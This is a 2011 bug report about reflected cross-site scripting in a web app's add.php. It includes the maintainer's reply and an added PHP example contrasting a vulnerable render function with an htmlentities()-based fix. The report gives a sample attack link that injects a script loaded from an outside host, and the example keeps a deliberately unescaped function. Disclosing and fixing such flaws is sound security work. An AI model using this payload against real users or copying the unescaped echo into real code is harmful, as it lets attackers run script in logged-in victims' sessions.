What steps will reproduce the problem?
1. If a user is logged into the system, an attacker can exploit add.php by sending the user a link with a script in the GET field.
2. If the user is logged in, then the attacker can execute any JavaScript code, including code loaded from a foreign website.
What is the expected output? What do you see instead?
This type of untrusted input should be rejected. Instead, it was echoed to the browser.
Please use labels and text to provide additional information.
This is a sample link that a logged-in user could receive:
http://VictimWebApp.com/add.php?rss_url="><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT
URL-encoded version:
http://VictimWebApp.com/add.php?rss_url=%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT
This script is not dangerous, it only demonstrates an XSS attack.
I have attached one potential fix. It should be noted that this attack can also work on POST fields, so I have fixed those as well.
Original issue reported on code.google.com by [email protected] on 18 May 2011 at 7:56
Thanks for reporting this, I will apply a similar change to yours. I will use htmlentities() to sanitize $url, $opml, and $file at the point that they are output to the HTML page.
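The output-encoding fix the maintainer describes, written out as an added example. This is not the project's add.php and not the attached patch: the rss_url field name and the payload come from the report; the form markup, the function names (html_escape, render_form_vulnerable, render_form_fixed, is_http_url) and the PHP version assumptions are mine. It also goes one step past the reply: because rss_url is a URL the application may later render as a link target, it shows a scheme check alongside the encoding, since htmlentities() alone does not stop a javascript: URL placed in an href.

```php
<?php
// Added example (not the project's code). Shows the reflected XSS from the
// report beside the htmlentities() fix from the maintainer's reply.
// Assumed: PHP 7.0+ (for ?? and scalar type hints).

declare(strict_types=1);

// Encode a value for an HTML body or a quoted attribute value.
// ENT_QUOTES also escapes the single quote, which PHP's historical default
// (ENT_COMPAT) leaves alone; ENT_SUBSTITUTE replaces invalid UTF-8 bytes
// instead of making htmlentities() return an empty string. The explicit
// charset matters on PHP < 5.4, where the default was ISO-8859-1.
function html_escape(string $s): string
{
    return htmlentities($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable: the untrusted parameter is echoed straight into the page.
// The "> at the start of the reporter's payload closes the value attribute
// and the <input> tag, so the <SCRIPT> that follows is parsed as markup.
function render_form_vulnerable(string $rssUrl): string
{
    return '<input type="text" name="rss_url" value="' . $rssUrl . '">';
}

// Fixed: same template, but the value is encoded at the point of output,
// which is exactly where the reply says $url, $opml and $file will be handled.
function render_form_fixed(string $rssUrl): string
{
    return '<input type="text" name="rss_url" value="' . html_escape($rssUrl) . '">';
}

// Encoding is the right fix for the attribute context above. If the same
// value is also used as a link target (<a href="...">), encoding does not
// block a javascript: scheme, so validate the scheme separately. This check
// is an assumption about how the stored feed URL is later used, not something
// the report states.
function is_http_url(string $s): bool
{
    if (filter_var($s, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($s, PHP_URL_SCHEME));
    return $scheme === 'http' || $scheme === 'https';
}

// Constructed input: the GET value a victim sends by following the sample
// link. PHP has already URL-decoded it into $_GET['rss_url'].
$payload = '"><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT';

echo render_form_vulnerable($payload), PHP_EOL;
echo render_form_fixed($payload), PHP_EOL;
var_dump(is_http_url($payload));                       // the payload is not a URL
var_dump(is_http_url('javascript:alert(1)'));          // wrong scheme
var_dump(is_http_url('http://example.com/feed.rss'));  // accepted

// How the request handler would wire it up (assumed structure of add.php):
$rssUrl = $_GET['rss_url'] ?? '';
echo render_form_fixed($rssUrl), PHP_EOL;
```

Run it from the command line with `php add_example.php`. The vulnerable line prints the payload verbatim, so the browser would see a closed `<input>` followed by a live `<SCRIPT>` tag; the fixed line prints `&quot;&gt;&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT` inside the attribute, which the browser renders as text. The same html_escape() call is what the POST-handled fields need, since the encoding is applied where the value is written into HTML, not where it is read.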